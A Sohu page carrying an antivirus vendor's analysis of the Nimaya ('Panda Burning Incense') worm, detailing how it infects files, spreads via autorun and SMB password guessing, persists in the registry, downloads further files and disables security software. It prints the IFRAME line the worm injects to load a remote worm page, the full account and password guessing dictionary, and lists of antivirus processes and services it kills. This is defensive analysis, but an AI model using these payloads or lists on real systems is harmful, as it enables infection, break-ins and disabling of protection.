搜狐网站
搜狐 ChinaRen 17173 焦点房地产 搜狗
搜狐数码-搜狐网站
搜狐数码频道 > 软件·安全·信息化 > 病毒与安全 > 毒报·防杀

瑞星最新病毒分析报告:Nimaya(熊猫烧香)

  这是一个传染型的DownLoad 使用Delphi编写

  该病毒的主要行为:

  一.传播

  1.本地磁盘感染

  病毒对系统中所有除了盘符为A,B的磁盘类型为DRIVE_REMOTE,DRIVE_FIXED的磁盘进行

  文件遍历感染注:不感染文件大小超过10485760字节以上的.

  (病毒将不感染如下目录的文件):

  Microsoft Frontpage

  Movie Maker

  MSN Gamin Zone

  Common Files

  Windows NT

  Recycled

  System Volume Information

  Documents and Settings

  ....

  (病毒将不感染文件名如下的文件):

  setup.exe

  NTDETECT.COM

  病毒将使用两类感染方式应对不同后缀的文件名进行感染

  1.二进制可执行文件(后缀后为:EXE,SCR,PIF,COM)

  将感染目标文件和病毒溶合成一个文件(被感染文件贴在病毒文件尾部)完成感染.

  2.脚本类(后缀名为:htm,html,asp,php,jsp,aspx)

  在这些脚本文件尾加上如下链接(下边的页面存在安全漏洞):

  <IFRAME src="http://www.krvkr.com/worm.htm" width=height=0></IFRAME>

  在感染时会删除这些磁盘上的后缀名为.GHO

  2.生成autorun.inf

  病毒建立一个计时器以,6秒为周期在磁盘的根目录下生成

  setup.exe(病毒本身) autorun.inf 并利用AutoRun Open关联

  使病毒在用户点击被感染磁盘时能被自动运行.

  3.局域网传播

  病毒生成随机几个局域网传播线程实现如下的传播方式:

  当病毒发现能成功联接攻击目标的139或445端口后,将使用内置的一个用户列表及密码字典

  进行联接.(猜测被攻击端的密码)当成功的联接上以后将自己复制过去并利用计划任务

  启动激活病毒.

  被尝试猜测密码的账户号为:

  Administrator

  Guest

  admin

  Root

  用来进行密码尝试的字典为:

  1234

  password

  6969

  harley

  123456

  golf

  pussy

  mustang

  1111

  shadow

  1313

  fish

  5150

  7777

  qwerty

  baseball

  2112

  letmein

  mein

  12345678

  12345

  admin

  5201314

  qq520

  1234567

  123456789

  654321

  54321

  000000

  11111111

  88888888

  pass

  passwd

  database

  abcd

  abc123

  sybase

  123qwe

  server

  computer

  super

  123asd

  ihavenopass

  godblessyou

  enable

  2002

  2003

  2600

  alpha

  111111

  121212

  123123

  1234qwer

  123abc

  patrick

  administrator

  ator

  root

  fuckyou

  fuck

  test

  test123

  temp

  temp123

  asdf

  qwer

  yxcv

  zxcv

  home

  owner

  login

  Login

  pw123

  love

  mypc

  mypc123

  admin123

  mypass

  mypass123

  901100

  二.修改操作系统的启动关联

  病毒会将自己复制到%SYSTEM32%\DRIVERS\目录下文件名为:spcolsv.exe将以

  1秒钟为周期不断设置如下键值:

  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

  svcshare=%病毒文件路径%

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows

  \CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL

  CheckedValue=0

  三.下载文件启动

  病毒会以20分钟为周期尝试读取特定网站上的下载文件列表

  如:http://wangma.9966.org/down.txt

  并根据文件列表指定的文件下载,并启动这些程序.

  四.与杀毒软件对抗

  1.关闭包含以下字符串的窗口:

  防火墙

  VirusScan

  NOD32

  网镖

  杀毒

  毒霸

  瑞星

  超级兔子

  优化大师

  大师

  木马清道夫

  木馬清道夫

  卡巴斯基反病毒

  Symantec AntiVirus

  Duba

  esteem procs

  绿鹰PC

  密码防盗

  噬菌体

  木马辅助查找器

  System Safety Monitor

  Wrapped gift Killer

  Winsock Expert

  游戏木马检测大师

  超级巡警

  IceSword

  2.结束以下进程:

  Mcshield.exe

  VsTskMgr.exe

  naPrdMgr.exe

  UpdaterUI.exe

  TBMon.exe

  scan32.exe

  Ravmond.exe

  CCenter.exe

  RavTask.exe

  Rav.exe

  Ravmon.exe

  RavmonD.exe

  RavStub.exe

  KVXP.kxp

  KvMonXP.kxp

  KVCenter.kxp

  KVSrvXP.exe

  KRegEx.exe

  UIHost.exe

  TrojDie.kxp

  FrogAgent.exe

  Logo1_.exe

  Logo_1.exe

  Rundl132.exe

  regedit.exe

  msconfig.exe

  taskmgr.exe

  3.关闭并删除以下服务:

  Schedule

  sharedaccess

  RsCCenter

  RsRavMon

  RsCCenter

  KVWSC

  KVSrvXP

  kavsvc

  AVP

  McAfeeFramework

  McShield

  McTaskManager

  navapsvc

  wscsvc

  KPfwSvc

  SNDSrvc

  ccProxy

  ccEvtMgr

  ccSetMgr

  SPBBCSvc

  Symantec Core LC

  NPFMntor

  MskService

  FireSvc

  注:

  因为该病毒会感染系统的htm,html,asp,php,jsp,aspx等文件,并在其中加入有利用安全漏洞进行病毒传播的链接.如果一台服务器被感染将大大增加病毒传播的范围. 

(责任编辑:韩建光)

用户:  匿名  隐藏地址  设为辩论话题

我要发布Sogou推广服务

新闻 网页 博客 音乐 图片 说吧  
央视质疑29岁市长 邓玉娇失踪 朝鲜军事演习 日本兵赎罪
石首网站被黑 篡改温总讲话 夏日减肥秘方 日本瘦脸法
宋美龄牛奶洗澡 中共卧底结局 慈禧不快乐 侵略中国报告



搜狐博客更多>>

·怀念丁聪:我以为那个老头永远不老
·爱历史|年轻时代的毛泽东(组图)
·曾鹏宇|雷人!我在绝对唱响做评委
·爱历史|1977年华国锋视察大庆油田
·韩浩月|批评余秋雨是侮辱中国人?
·荣林|广州珠海桥事件:被推下的是谁
·朱顺忠|如何把贪官关进笼子里
·张原|杭州飙车案中父亲角色的缺失
·蔡天新|奥数本身并不是坏事(图)
·王攀|副县长之女施暴的卫生巾疑虑

热点标签:奥运 珠峰 福娃 母亲节 印花税 火炬 日本 赵薇 外遇 股票 金晶 陈冠希 谢霆锋 CNN 中国足球 张柏芝 姚明

说 吧更多>>

相 关 说 吧

方式

说 吧 排 行

茶 余 饭 后更多>>